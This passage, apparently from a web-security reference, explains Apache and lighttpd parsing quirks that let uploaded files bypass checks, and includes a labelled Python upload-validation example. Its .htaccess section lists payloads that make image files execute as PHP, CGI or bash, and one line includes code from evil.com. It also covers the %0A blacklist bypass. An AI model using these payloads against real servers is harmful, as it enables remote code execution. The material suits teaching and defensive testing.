4.15.2. Apache
4.15.2.1. Suffix parsing
Consider a file named test.php.x1.x2.x3, where x1, x2 and x3 are file types not defined in the mime.types file. Apache judges the suffix from right to left. If x3 is not an identifiable suffix, it moves on to x2, and so on until an identifiable suffix is found, and then parses the file according to that suffix.
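The following added example (not part of the original page) models the right-to-left rule as described above and uses it to flag upload names whose last suffix looks harmless but whose effective suffix is executable. KNOWN_SUFFIXES, EXECUTABLE_SUFFIXES, the allow-list and all function names are assumptions chosen for illustration; replace the sets with what the server's mime.types and handler configuration actually recognize.

```python
# Added example. The suffix sets are constructed stand-ins for the server's
# mime.types entries and handler mappings, not values taken from the page.
KNOWN_SUFFIXES = {"php", "phtml", "jpg", "png", "gif", "txt", "html"}
EXECUTABLE_SUFFIXES = {"php", "phtml"}
ALLOWED_UPLOAD_SUFFIXES = {"jpg", "png", "gif"}


def _basename(filename):
    """Strip any directory part, accepting both slash styles."""
    return filename.replace("\\", "/").rsplit("/", 1)[-1]


def effective_suffix(filename, known=KNOWN_SUFFIXES):
    """Return the first recognized suffix scanning right to left, or None."""
    parts = _basename(filename).lower().split(".")
    for suffix in reversed(parts[1:]):  # parts[0] is the base name
        if suffix in known:
            return suffix
    return None


def hidden_executables(filenames):
    """Names whose last suffix is not executable but whose effective one is."""
    flagged = []
    for name in filenames:
        base = _basename(name).lower()
        last = base.rsplit(".", 1)[-1] if "." in base else ""
        if (last not in EXECUTABLE_SUFFIXES
                and effective_suffix(name) in EXECUTABLE_SUFFIXES):
            flagged.append(name)
    return flagged


def is_upload_allowed(filename, allowed=ALLOWED_UPLOAD_SUFFIXES):
    """Allow-list check over every suffix, so an unknown trailing suffix
    cannot hide an executable one further left."""
    base = _basename(filename)
    # Reject control characters and dotfiles before looking at suffixes.
    if base.startswith(".") or any(ord(c) < 0x20 or ord(c) == 0x7F for c in base):
        return False
    suffixes = base.lower().split(".")[1:]
    return bool(suffixes) and all(s in allowed for s in suffixes)
```

Checking only the last suffix against a blacklist misses test.php.x1.x2.x3; requiring every suffix to be on an allow-list, or renaming uploads to a server-generated name, does not.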
4.15.2.2. .htaccess
When AllowOverride is enabled, an uploaded .htaccess file can enable parsing rules, for example:
AddType application/x-httpd-php .jpg

php_value auto_append_file .htaccess
#<?php phpinfo();

Options ExecCGI
AddHandler cgi-script .jpg

Options +ExecCGI
AddHandler fcgid-script .gif
FcgidWrapper "/bin/bash" .gif

php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://evil.com/evil-code.txt
4.15.2.3. Directory Traversal
Apache has a directory traversal vulnerability when it is configured with Options +Indexes.
4.15.2.4. CVE-2017-15715
%0A can be used to bypass an upload blacklist.
4.15.2.5. lighttpd
xx.jpg/xx.php